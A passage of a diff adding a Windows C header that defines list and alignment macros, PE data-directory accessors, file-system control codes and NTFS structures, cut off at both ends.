_EX_Blink;\ + _EX_Blink->Flink = (Entry);\ + _EX_ListHead->Blink = (Entry);\ + } + +// VOID +// InsertHeadList( +// IN PLIST_ENTRY ListHead, +// IN PLIST_ENTRY Entry +// ); +#define InsertHeadList(ListHead,Entry) {\ + PLIST_ENTRY _EX_Flink;\ + PLIST_ENTRY _EX_ListHead;\ + _EX_ListHead = (ListHead);\ + _EX_Flink = _EX_ListHead->Flink;\ + (Entry)->Flink = _EX_Flink;\ + (Entry)->Blink = _EX_ListHead;\ + _EX_Flink->Blink = (Entry);\ + _EX_ListHead->Flink = (Entry);\ + } + +// BOOL +// COUNT_IS_ALIGNED( +// IN DWORD Count, +// IN DWORD Pow2 // undefined if this isn't a power of 2. +// ); +// +#define COUNT_IS_ALIGNED(Count,Pow2) \ + ( ( ( (Count) & (((Pow2)-1)) ) == 0) ? TRUE : FALSE ) + +// BOOL +// POINTER_IS_ALIGNED( +// IN LPVOID Ptr, +// IN DWORD Pow2 // undefined if this isn't a power of 2. +// ); +// +#define POINTER_IS_ALIGNED(Ptr,Pow2) \ + ( ( ( ((DWORD)(Ptr)) & (((Pow2)-1)) ) == 0) ? TRUE : FALSE ) + + +#define ROUND_DOWN_COUNT(Count,Pow2) \ + ( (Count) & (~((Pow2)-1)) ) + +#define ROUND_DOWN_POINTER(Ptr,Pow2) \ + ( (LPVOID) ROUND_DOWN_COUNT( ((DWORD)(Ptr)), (Pow2) ) ) + + +// If Count is not already aligned, then +// round Count up to an even multiple of "Pow2". "Pow2" must be a power of 2. +// +// DWORD +// ROUND_UP_COUNT( +// IN DWORD Count, +// IN DWORD Pow2 +// ); +#define ROUND_UP_COUNT(Count,Pow2) \ + ( ((Count)+(Pow2)-1) & (~((Pow2)-1)) ) + +// LPVOID +// ROUND_UP_POINTER( +// IN LPVOID Ptr, +// IN DWORD Pow2 +// ); + +// If Ptr is not already aligned, then round it up until it is. +#define ROUND_UP_POINTER(Ptr,Pow2) \ + ( (LPVOID) ( (((DWORD)(Ptr))+(Pow2)-1) & (~((Pow2)-1)) ) ) + +#define ALIGN_BYTE 1 +#define ALIGN_CHAR 1 +#define ALIGN_DESC_CHAR sizeof(DESC_CHAR) +#define ALIGN_DWORD 4 +#define ALIGN_LONG 4 +#define ALIGN_LPBYTE 4 +#define ALIGN_LPDWORD 4 +#define ALIGN_LPSTR 4 +#define ALIGN_LPTSTR 4 +#define ALIGN_LPVOID 4 +#define ALIGN_LPWORD 4 +#define ALIGN_TCHAR sizeof(TCHAR) +#define ALIGN_WCHAR sizeof(WCHAR) +#define ALIGN_WORD 2 +#define ALIGN_QUAD 8 + +#define ALIGN_WORST 8 + +//03.06.2011 - added +#define QUAD_ALIGN(VALUE) ( ((ULONG)(VALUE) + 7) & ~7 ) +//03.06.2011 - end + +// Usage: myPtr = ROUND_UP_POINTER(unalignedPtr, ALIGN_DWORD); + +// 31.05.2011 - added +#define EXPORT_VA(x) ((x)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress) +#define IMPORT_VA(x) ((x)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress) +#define RELOC_VA(x) ((x)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress) +#define RESOURCE_VA(x) ((x)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_RESOURCE].VirtualAddress) + +#define EXPORT_SIZE(x) ((x)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size) +#define IMPORT_SIZE(x) ((x)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size) +#define RELOC_SIZE(x) ((x)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size) +#define RESOURCE_SIZE(x) ((x)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_RESOURCE].Size) +#define DEBUGDIR_VA(x) ((x)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_DEBUG].VirtualAddress) +#define DEBUGDIR_SIZE(x) ((x)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_DEBUG].Size) +// 31.05.2011 - end + +#define IS_VALID_HANDLE(hHandle) ((HANDLE)hHandle != (HANDLE)0 && (HANDLE)hHandle != (HANDLE)0xFFFFFFFF) +#define SIZEOF_ARRAY(arr) ( sizeof(arr) / sizeof(arr[0]) ) +// 09.06.2011 - begin + +//21.12.2011 added +#if !defined(_FILESYSTEMFSCTL_) +#define _FILESYSTEMFSCTL_ + +#define FSCTL_REQUEST_OPLOCK_LEVEL_1 CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 0, METHOD_BUFFERED, FILE_ANY_ACCESS) +#define FSCTL_REQUEST_OPLOCK_LEVEL_2 CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 1, METHOD_BUFFERED, FILE_ANY_ACCESS) +#define FSCTL_REQUEST_BATCH_OPLOCK CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 2, METHOD_BUFFERED, FILE_ANY_ACCESS) +#define FSCTL_OPLOCK_BREAK_ACKNOWLEDGE CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 3, METHOD_BUFFERED, FILE_ANY_ACCESS) +#define FSCTL_OPBATCH_ACK_CLOSE_PENDING CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 4, METHOD_BUFFERED, FILE_ANY_ACCESS) +#define FSCTL_OPLOCK_BREAK_NOTIFY CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 5, METHOD_BUFFERED, FILE_ANY_ACCESS) +#define FSCTL_LOCK_VOLUME CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 6, METHOD_BUFFERED, FILE_ANY_ACCESS) +#define FSCTL_UNLOCK_VOLUME CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 7, METHOD_BUFFERED, FILE_ANY_ACCESS) +#define FSCTL_DISMOUNT_VOLUME CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 8, METHOD_BUFFERED, FILE_ANY_ACCESS) +// decommissioned fsctl value 9 +#define FSCTL_IS_VOLUME_MOUNTED CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 10, METHOD_BUFFERED, FILE_ANY_ACCESS) +#define FSCTL_IS_PATHNAME_VALID CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 11, METHOD_BUFFERED, FILE_ANY_ACCESS) // PATHNAME_BUFFER, +#define FSCTL_MARK_VOLUME_DIRTY CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 12, METHOD_BUFFERED, FILE_ANY_ACCESS) +// decommissioned fsctl value 13 +#define FSCTL_QUERY_RETRIEVAL_POINTERS CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 14, METHOD_NEITHER, FILE_ANY_ACCESS) +#define FSCTL_GET_COMPRESSION CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 15, METHOD_BUFFERED, FILE_ANY_ACCESS) +#define FSCTL_SET_COMPRESSION CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 16, METHOD_BUFFERED, FILE_READ_DATA | FILE_WRITE_DATA) +// decommissioned fsctl value 17 +// decommissioned fsctl value 18 +#define FSCTL_SET_BOOTLOADER_ACCESSED CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 19, METHOD_NEITHER, FILE_ANY_ACCESS) +#define FSCTL_OPLOCK_BREAK_ACK_NO_2 CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 20, METHOD_BUFFERED, FILE_ANY_ACCESS) +#define FSCTL_INVALIDATE_VOLUMES CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 21, METHOD_BUFFERED, FILE_ANY_ACCESS) +#define FSCTL_QUERY_FAT_BPB CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 22, METHOD_BUFFERED, FILE_ANY_ACCESS) // FSCTL_QUERY_FAT_BPB_BUFFER +#define FSCTL_REQUEST_FILTER_OPLOCK CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 23, METHOD_BUFFERED, FILE_ANY_ACCESS) +#define FSCTL_FILESYSTEM_GET_STATISTICS CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 24, METHOD_BUFFERED, FILE_ANY_ACCESS) // FILESYSTEM_STATISTICS + +#if (_WIN32_WINNT >= 0x0400) +#define FSCTL_GET_NTFS_VOLUME_DATA CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 25, METHOD_BUFFERED, FILE_ANY_ACCESS) // NTFS_VOLUME_DATA_BUFFER +#define FSCTL_GET_NTFS_FILE_RECORD CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 26, METHOD_BUFFERED, FILE_ANY_ACCESS) // NTFS_FILE_RECORD_INPUT_BUFFER, NTFS_FILE_RECORD_OUTPUT_BUFFER +#define FSCTL_GET_VOLUME_BITMAP CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 27, METHOD_NEITHER, FILE_ANY_ACCESS) // STARTING_LCN_INPUT_BUFFER, VOLUME_BITMAP_BUFFER +#define FSCTL_GET_RETRIEVAL_POINTERS CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 28, METHOD_NEITHER, FILE_ANY_ACCESS) // STARTING_VCN_INPUT_BUFFER, RETRIEVAL_POINTERS_BUFFER +#define FSCTL_MOVE_FILE CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 29, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) // MOVE_FILE_DATA, +#define FSCTL_IS_VOLUME_DIRTY CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 30, METHOD_BUFFERED, FILE_ANY_ACCESS) +// decomissioned fsctl value 31 +#define FSCTL_ALLOW_EXTENDED_DASD_IO CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 32, METHOD_NEITHER, FILE_ANY_ACCESS) +#endif /* _WIN32_WINNT >= 0x0400 */ + +#if (_WIN32_WINNT >= 0x0500) +// decommissioned fsctl value 33 +// decommissioned fsctl value 34 +#define FSCTL_FIND_FILES_BY_SID CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 35, METHOD_NEITHER, FILE_ANY_ACCESS) +// decommissioned fsctl value 36 +// decommissioned fsctl value 37 +#define FSCTL_SET_OBJECT_ID CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 38, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) // FILE_OBJECTID_BUFFER +#define FSCTL_GET_OBJECT_ID CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 39, METHOD_BUFFERED, FILE_ANY_ACCESS) // FILE_OBJECTID_BUFFER +#define FSCTL_DELETE_OBJECT_ID CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 40, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) +#define FSCTL_SET_REPARSE_POINT CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 41, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) // REPARSE_DATA_BUFFER, +#define FSCTL_GET_REPARSE_POINT CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 42, METHOD_BUFFERED, FILE_ANY_ACCESS) // REPARSE_DATA_BUFFER +#define FSCTL_DELETE_REPARSE_POINT CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 43, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) // REPARSE_DATA_BUFFER, +#define FSCTL_ENUM_USN_DATA CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 44, METHOD_NEITHER, FILE_ANY_ACCESS) // MFT_ENUM_DATA, +#define FSCTL_SECURITY_ID_CHECK CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 45, METHOD_NEITHER, FILE_READ_DATA) // BULK_SECURITY_TEST_DATA, +#define FSCTL_READ_USN_JOURNAL CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 46, METHOD_NEITHER, FILE_ANY_ACCESS) // READ_USN_JOURNAL_DATA, USN +#define FSCTL_SET_OBJECT_ID_EXTENDED CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 47, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) +#define FSCTL_CREATE_OR_GET_OBJECT_ID CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 48, METHOD_BUFFERED, FILE_ANY_ACCESS) // FILE_OBJECTID_BUFFER +#define FSCTL_SET_SPARSE CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 49, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) +#define FSCTL_SET_ZERO_DATA CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 50, METHOD_BUFFERED, FILE_WRITE_DATA) // FILE_ZERO_DATA_INFORMATION, +#define FSCTL_QUERY_ALLOCATED_RANGES CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 51, METHOD_NEITHER, FILE_READ_DATA) // FILE_ALLOCATED_RANGE_BUFFER, FILE_ALLOCATED_RANGE_BUFFER +#define FSCTL_ENABLE_UPGRADE CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 52, METHOD_BUFFERED, FILE_WRITE_DATA) +// decommissioned fsctl value 52 +#define FSCTL_SET_ENCRYPTION CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 53, METHOD_NEITHER, FILE_ANY_ACCESS) // ENCRYPTION_BUFFER, DECRYPTION_STATUS_BUFFER +#define FSCTL_ENCRYPTION_FSCTL_IO CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 54, METHOD_NEITHER, FILE_ANY_ACCESS) +#define FSCTL_WRITE_RAW_ENCRYPTED CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 55, METHOD_NEITHER, FILE_SPECIAL_ACCESS) // ENCRYPTED_DATA_INFO, EXTENDED_ENCRYPTED_DATA_INFO +#define FSCTL_READ_RAW_ENCRYPTED CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 56, METHOD_NEITHER, FILE_SPECIAL_ACCESS) // REQUEST_RAW_ENCRYPTED_DATA, ENCRYPTED_DATA_INFO, EXTENDED_ENCRYPTED_DATA_INFO +#define FSCTL_CREATE_USN_JOURNAL CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 57, METHOD_NEITHER, FILE_ANY_ACCESS) // CREATE_USN_JOURNAL_DATA, +#define FSCTL_READ_FILE_USN_DATA CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 58, METHOD_NEITHER, FILE_ANY_ACCESS) // Read the Usn Record for a file +#define FSCTL_WRITE_USN_CLOSE_RECORD CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 59, METHOD_NEITHER, FILE_ANY_ACCESS) // Generate Close Usn Record +#define FSCTL_EXTEND_VOLUME CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 60, METHOD_BUFFERED, FILE_ANY_ACCESS) +#define FSCTL_QUERY_USN_JOURNAL CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 61, METHOD_BUFFERED, FILE_ANY_ACCESS) +#define FSCTL_DELETE_USN_JOURNAL CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 62, METHOD_BUFFERED, FILE_ANY_ACCESS) +#define FSCTL_MARK_HANDLE CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 63, METHOD_BUFFERED, FILE_ANY_ACCESS) +#define FSCTL_SIS_COPYFILE CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 64, METHOD_BUFFERED, FILE_ANY_ACCESS) +#define FSCTL_SIS_LINK_FILES CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 65, METHOD_BUFFERED, FILE_READ_DATA | FILE_WRITE_DATA) +// decommissional fsctl value 66 +// decommissioned fsctl value 67 +// decommissioned fsctl value 68 +#define FSCTL_RECALL_FILE CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 69, METHOD_NEITHER, FILE_ANY_ACCESS) +// decommissioned fsctl value 70 +#define FSCTL_READ_FROM_PLEX CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 71, METHOD_OUT_DIRECT, FILE_READ_DATA) +#define FSCTL_FILE_PREFETCH CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 72, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) // FILE_PREFETCH +#endif /* _WIN32_WINNT >= 0x0500 */ + +#if (_WIN32_WINNT >= 0x0600) +#define FSCTL_MAKE_MEDIA_COMPATIBLE CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 76, METHOD_BUFFERED, FILE_WRITE_DATA) // UDFS R/W +#define FSCTL_SET_DEFECT_MANAGEMENT CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 77, METHOD_BUFFERED, FILE_WRITE_DATA) // UDFS R/W +#define FSCTL_QUERY_SPARING_INFO CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 78, METHOD_BUFFERED, FILE_ANY_ACCESS) // UDFS R/W +#define FSCTL_QUERY_ON_DISK_VOLUME_INFO CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 79, METHOD_BUFFERED, FILE_ANY_ACCESS) // C/UDFS +#define FSCTL_SET_VOLUME_COMPRESSION_STATE CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 80, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) // VOLUME_COMPRESSION_STATE +// decommissioned fsctl value 80 +#define FSCTL_TXFS_MODIFY_RM CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 81, METHOD_BUFFERED, FILE_WRITE_DATA) // TxF +#define FSCTL_TXFS_QUERY_RM_INFORMATION CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 82, METHOD_BUFFERED, FILE_READ_DATA) // TxF +// decommissioned fsctl value 83 +#define FSCTL_TXFS_ROLLFORWARD_REDO CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 84, METHOD_BUFFERED, FILE_WRITE_DATA) // TxF +#define FSCTL_TXFS_ROLLFORWARD_UNDO CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 85, METHOD_BUFFERED, FILE_WRITE_DATA) // TxF +#define FSCTL_TXFS_START_RM CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 86, METHOD_BUFFERED, FILE_WRITE_DATA) // TxF +#define FSCTL_TXFS_SHUTDOWN_RM CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 87, METHOD_BUFFERED, FILE_WRITE_DATA) // TxF +#define FSCTL_TXFS_READ_BACKUP_INFORMATION CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 88, METHOD_BUFFERED, FILE_READ_DATA) // TxF +#define FSCTL_TXFS_WRITE_BACKUP_INFORMATION CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 89, METHOD_BUFFERED, FILE_WRITE_DATA) // TxF +#define FSCTL_TXFS_CREATE_SECONDARY_RM CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 90, METHOD_BUFFERED, FILE_WRITE_DATA) // TxF +#define FSCTL_TXFS_GET_METADATA_INFO CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 91, METHOD_BUFFERED, FILE_READ_DATA) // TxF +#define FSCTL_TXFS_GET_TRANSACTED_VERSION CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 92, METHOD_BUFFERED, FILE_READ_DATA) // TxF +// decommissioned fsctl value 93 +#define FSCTL_TXFS_SAVEPOINT_INFORMATION CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 94, METHOD_BUFFERED, FILE_WRITE_DATA) // TxF +#define FSCTL_TXFS_CREATE_MINIVERSION CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 95, METHOD_BUFFERED, FILE_WRITE_DATA) // TxF +// decommissioned fsctl value 96 +// decommissioned fsctl value 97 +// decommissioned fsctl value 98 +#define FSCTL_TXFS_TRANSACTION_ACTIVE CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 99, METHOD_BUFFERED, FILE_READ_DATA) // TxF +#define FSCTL_SET_ZERO_ON_DEALLOCATION CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 101, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) +#define FSCTL_SET_REPAIR CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 102, METHOD_BUFFERED, FILE_ANY_ACCESS) +#define FSCTL_GET_REPAIR CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 103, METHOD_BUFFERED, FILE_ANY_ACCESS) +#define FSCTL_WAIT_FOR_REPAIR CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 104, METHOD_BUFFERED, FILE_ANY_ACCESS) +// decommissioned fsctl value 105 +#define FSCTL_INITIATE_REPAIR CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 106, METHOD_BUFFERED, FILE_ANY_ACCESS) +#define FSCTL_CSC_INTERNAL CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 107, METHOD_NEITHER, FILE_ANY_ACCESS) // CSC internal implementation +#define FSCTL_SHRINK_VOLUME CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 108, METHOD_BUFFERED, FILE_SPECIAL_ACCESS) // SHRINK_VOLUME_INFORMATION +#define FSCTL_SET_SHORT_NAME_BEHAVIOR CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 109, METHOD_BUFFERED, FILE_ANY_ACCESS) +#define FSCTL_DFSR_SET_GHOST_HANDLE_STATE CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 110, METHOD_BUFFERED, FILE_ANY_ACCESS) + +// +// Values 111 - 119 are reserved for FSRM. +// + +#define FSCTL_TXFS_LIST_TRANSACTION_LOCKED_FILES \ + CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 120, METHOD_BUFFERED, FILE_READ_DATA) // TxF +#define FSCTL_TXFS_LIST_TRANSACTIONS CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 121, METHOD_BUFFERED, FILE_READ_DATA) // TxF +#define FSCTL_QUERY_PAGEFILE_ENCRYPTION CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 122, METHOD_BUFFERED, FILE_ANY_ACCESS) +#endif /* _WIN32_WINNT >= 0x0600 */ + +#if (_WIN32_WINNT >= 0x0600) +#define FSCTL_RESET_VOLUME_ALLOCATION_HINTS CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 123, METHOD_BUFFERED, FILE_ANY_ACCESS) +#endif /* _WIN32_WINNT >= 0x0600 */ + +#if (_WIN32_WINNT >= 0x0601) +#define FSCTL_QUERY_DEPENDENT_VOLUME CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 124, METHOD_BUFFERED, FILE_ANY_ACCESS) // Dependency File System Filter +#define FSCTL_SD_GLOBAL_CHANGE CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 125, METHOD_BUFFERED, FILE_ANY_ACCESS) // Update NTFS Security Descriptors +#endif /* _WIN32_WINNT >= 0x0601 */ + +#if (_WIN32_WINNT >= 0x0600) +#define FSCTL_TXFS_READ_BACKUP_INFORMATION2 CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 126, METHOD_BUFFERED, FILE_ANY_ACCESS) // TxF +#endif /* _WIN32_WINNT >= 0x0600 */ + +#if (_WIN32_WINNT >= 0x0601) +#define FSCTL_LOOKUP_STREAM_FROM_CLUSTER CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 127, METHOD_BUFFERED, FILE_ANY_ACCESS) +#define FSCTL_TXFS_WRITE_BACKUP_INFORMATION2 CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 128, METHOD_BUFFERED, FILE_ANY_ACCESS) // TxF +#define FSCTL_FILE_TYPE_NOTIFICATION CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 129, METHOD_BUFFERED, FILE_ANY_ACCESS) +#endif + +// Values 130 - 130 are available +// Values 131 - 139 are reserved for FSRM. + +#if (_WIN32_WINNT >= 0x0601) +#define FSCTL_GET_BOOT_AREA_INFO CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 140, METHOD_BUFFERED, FILE_ANY_ACCESS) // BOOT_AREA_INFO +#define FSCTL_GET_RETRIEVAL_POINTER_BASE CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 141, METHOD_BUFFERED, FILE_ANY_ACCESS) // RETRIEVAL_POINTER_BASE +#define FSCTL_SET_PERSISTENT_VOLUME_STATE CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 142, METHOD_BUFFERED, FILE_ANY_ACCESS) // FILE_FS_PERSISTENT_VOLUME_INFORMATION +#define FSCTL_QUERY_PERSISTENT_VOLUME_STATE CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 143, METHOD_BUFFERED, FILE_ANY_ACCESS) // FILE_FS_PERSISTENT_VOLUME_INFORMATION + +#define FSCTL_REQUEST_OPLOCK CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 144, METHOD_BUFFERED, FILE_ANY_ACCESS) + +#define FSCTL_CSV_TUNNEL_REQUEST CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 145, METHOD_BUFFERED, FILE_ANY_ACCESS) // CSV_TUNNEL_REQUEST +#define FSCTL_IS_CSV_FILE CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 146, METHOD_BUFFERED, FILE_ANY_ACCESS) // IS_CSV_FILE + +#define FSCTL_QUERY_FILE_SYSTEM_RECOGNITION CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 147, METHOD_BUFFERED, FILE_ANY_ACCESS) // +#define FSCTL_CSV_GET_VOLUME_PATH_NAME CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 148, METHOD_BUFFERED, FILE_ANY_ACCESS) +#define FSCTL_CSV_GET_VOLUME_NAME_FOR_VOLUME_MOUNT_POINT CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 149, METHOD_BUFFERED, FILE_ANY_ACCESS) +#define FSCTL_CSV_GET_VOLUME_PATH_NAMES_FOR_VOLUME_NAME CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 150, METHOD_BUFFERED, FILE_ANY_ACCESS) +#define FSCTL_IS_FILE_ON_CSV_VOLUME CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 151, METHOD_BUFFERED, FILE_ANY_ACCESS) + +#endif /* _WIN32_WINNT >= 0x0601 */ + +#define FSCTL_MARK_AS_SYSTEM_HIVE FSCTL_SET_BOOTLOADER_ACCESSED + + +#if(_WIN32_WINNT >= 0x0601) + +typedef struct _CSV_NAMESPACE_INFO { + + ULONG Version; + ULONG DeviceNumber; + LARGE_INTEGER StartingOffset; + ULONG SectorSize; + +} CSV_NAMESPACE_INFO, *PCSV_NAMESPACE_INFO; + +#define CSV_NAMESPACE_INFO_V1 (sizeof(CSV_NAMESPACE_INFO)) +#define CSV_INVALID_DEVICE_NUMBER 0xFFFFFFFF + +#endif /* _WIN32_WINNT >= 0x0601 */ + +typedef struct _PATHNAME_BUFFER { + + ULONG PathNameLength; + WCHAR Name[1]; + +} PATHNAME_BUFFER, *PPATHNAME_BUFFER; + +typedef struct _FSCTL_QUERY_FAT_BPB_BUFFER { + + UCHAR First0x24BytesOfBootSector[0x24]; + +} FSCTL_QUERY_FAT_BPB_BUFFER, *PFSCTL_QUERY_FAT_BPB_BUFFER; + +#if (_WIN32_WINNT >= 0x0400) + +typedef struct { + + LARGE_INTEGER VolumeSerialNumber; + LARGE_INTEGER NumberSectors; + LARGE_INTEGER TotalClusters; + LARGE_INTEGER FreeClusters; + LARGE_INTEGER TotalReserved; + ULONG BytesPerSector; + ULONG BytesPerCluster; + ULONG BytesPerFileRecordSegment; + ULONG ClustersPerFileRecordSegment; + LARGE_INTEGER MftValidDataLength; + LARGE_INTEGER MftStartLcn; + LARGE_INTEGER Mft2StartLcn; + LARGE_INTEGER MftZoneStart; + LARGE_INTEGER MftZoneEnd; + +} NTFS_VOLUME_DATA_BUFFER, *PNTFS_VOLUME_DATA_BUFFER; + +typedef struct { + + ULONG ByteCount; + + USHORT MajorVersion; + USHORT MinorVersion; + +} NTFS_EXTENDED_VOLUME_DATA, *PNTFS_EXTENDED_VOLUME_DATA; +#endif /* _WIN32_WINNT >= 0x0400 */ + +#if (_WIN32_WINNT >= 0x0400) + +typedef struct { + + LARGE_INTEGER StartingLcn; + +} STARTING_LCN_INPUT_BUFFER, *PSTARTING_LCN_INPUT_BUFFER; + +typedef struct { + + LARGE_INTEGER StartingLcn; + LARGE_INTEGER BitmapSize; + UCHAR Buffer[1]; + +} VOLUME_BITMAP_BUFFER, *PVOLUME_BITMAP_BUFFER; +#endif /* _WIN32_WINNT >= 0x0400 */ + +#if (_WIN32_WINNT >= 0x0400) + +typedef struct { + + LARGE_INTEGER StartingVcn; + +} STARTING_VCN_INPUT_BUFFER, *PSTARTING_VCN_INPUT_BUFFER; + +typedef struct RETRIEVAL_POINTERS_BUFFER { + + ULONG ExtentCount; + LARGE_INTEGER StartingVcn; + struct { + LARGE_INTEGER NextVcn; + LARGE_INTEGER Lcn; + } Extents[1]; + +} RETRIEVAL_POINTERS_BUFFER, *PRETRIEVAL_POINTERS_BUFFER; +#endif /* _WIN32_WINNT >= 0x0400 */ + +#if (_WIN32_WINNT >= 0x0400) + +typedef struct { + + LARGE_INTEGER FileReferenceNumber; + +} NTFS_FILE_RECORD_INPUT_BUFFER, *PNTFS_FILE_RECORD_INPUT_BUFFER; + +typedef struct { + + LARGE_INTEGER FileReferenceNumber; + ULONG FileRecordLength; + UCHAR FileRecordBuffer[1]; + +} NTFS_FILE_RECORD_OUTPUT_BUFFER, *PNTFS_FILE_RECORD_OUTPUT_BUFFER; +#endif /* _WIN32_WINNT >= 0x0400 */ + +#if (_WIN32_WINNT >= 0x0400) + +typedef struct { + + HANDLE FileHandle; + LARGE_INTEGER StartingVcn; + LARGE_INTEGER StartingLcn; + ULONG ClusterCount; + +} MOVE_FILE_DATA, *PMOVE_FILE_DATA; + +typedef struct { + + HANDLE FileHandle; + 